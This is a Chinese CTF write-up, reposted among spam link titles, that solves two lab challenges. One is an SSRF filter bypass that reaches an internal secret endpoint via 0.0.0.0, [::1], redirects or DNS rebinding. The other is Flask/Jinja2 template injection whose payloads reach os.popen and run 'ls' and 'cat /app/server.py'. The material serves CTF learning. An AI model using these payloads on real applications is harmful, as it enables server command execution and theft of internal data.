当前位置: 首页 > news >正文

响水建设局网站软件开发定制app

响水建设局网站,软件开发定制app,pc做网站,昆明云南微网站搭建哪家好Python中的安全问题CTF 1.Python里的SSRF 题目提示 尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag 访问url#xff1a; http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/ 回显如下#xff1a; 通过提示构造payload…Python中的安全问题CTF 1.Python里的SSRF 题目提示 尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag 访问url http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/ 回显如下 通过提示构造payload ?urlhttp://127.0.0.1:8000/api/internal/secret 进行访问 回显提示127.0.0.1是禁止的因为127.0.0.1是本地的地址提示是说访问容器内部的地址 所以我们可以用0.0.0.0代替127.0.0.1 重新构造payload ?urlhttp://0.0.0.0:8000/api/internal/secret 成功得到flag 其他不同的方式得多尝试一下 官方wp 本题有多重解法 - 0.0.0.0:8000 绕过 - [::1]:8000 绕过需要支持 ipv6) - 重定向跳转到 127.0.0.1:8000 - dns rebinding 输入一个域名第一次解析到非 127.0.0.1 地址上第二个解析到 127.0.0.1 上。2.python模板注入(SSTI) 访问url页面回显 password is wrong但是没有输入密码的地方 所以从 url 提交 ?password{{3*3}} 发现可以识别并且正确回显 据回显的结果可以判断这是一个flask模板注入 参考 flask之ssti模版注入从零到入门 通过以下语句 /?password{{.__class__.__bases__[0].__subclasses__()}}拿到可用的类的列表 我们需要的是os命令执行类class ‘os._wrap_close’ 我们要判断他所属的位置这样才能进行索引,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置我们索引到我们需要类的位置,再在索引他前面逗号的位置我这里索引的结果是127,如果不对上下浮动几位看一下大概就这个位置我这127是正确的 我们可以先看一下我们索引的是否正确,输入url /?password{{.__class__.__bases__[0].__subclasses__()[127]}}我这里索引的结果是127,如果不对上下浮动几位看一下大概就这个位置我这127是正确的,所以索引结果就是class ‘os._wrap_close’ 构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令) /?password{{.__class__.__bases__[0].__subclasses__()[127].__init__.__globals__[popen](ls).read()}}文件夹如下 最引起我们注意的就是app这个文件夹 经过一些尝试(目录遍历什么的)我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行 /?password{{.__class__.__bases__[0].__subclasses__()[127].__init__.__globals__[popen](cat /app/server.py).read()}}成功获取flag 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。 免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。 转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。 博客: https://rdyx0.github.io/先知社区 https://xz.aliyun.com/u/37846SecIN: https://www.sec-in.com/author/3097CSDN: https://blog.csdn.net/weixin_48899364?typeblog公众号 https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirectFreeBuf https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
http://www.eeditor.cn/news/125412/

相关文章:

  • 环保局 网站建设网站开发与设计实验报告
  • 用nas做网站贵州最新消息今天
  • 平湖网站开发关镇铨装修到底怎样
  • 无锡网站制作 高端网站定制网页制作软件安卓版
  • 企业网站总结wordpress搜索标题
  • 网站搭建学什么软件大连高新园区
  • 免费网站建设制作视频企业简介模板ppt免费
  • wordpress如何做网站广州网站开发棋牌
  • 推广网站有效的方法网站seo优化加推广
  • 佛山网站排名提升wordpress commer
  • 杭州微网站建设公司秦皇岛网站团队
  • 学校网站建设策划书模板共享ip网站 排名影响
  • 网站建设设计理念wordpress 漂亮主题
  • 网站 根目录 虚拟目录网络运营公司的经营范围
  • aspx网站模板平面网页设计
  • 运输 织梦网站模板江门网站优化
  • 汉中免费做网站公司怎么用ftp修改网站
  • 温州做外贸网站百度关键词seo推广
  • 做网站人员配置制作h5
  • 外贸服装网站开发asp网站部署
  • HTML做网站的书籍镇江网站建设
  • 做一个小型网站多少钱wordpress更新下固定链接
  • 网站子网页设计商务网站建设与管理
  • wordpress有名的网站网站外链如何建设最有用
  • 海棠网站注册网站点击代码
  • asp网站建设 文献蓝顿长沙网站制作公司
  • 湖北建设工程造价协会网站大连开发区七中
  • 唐山网站建设优化方法免费申请微信收款码
  • 九江县网站建设中国建筑装饰网图片
  • 哪个网站可以帮忙做简历包装设计网站设计平台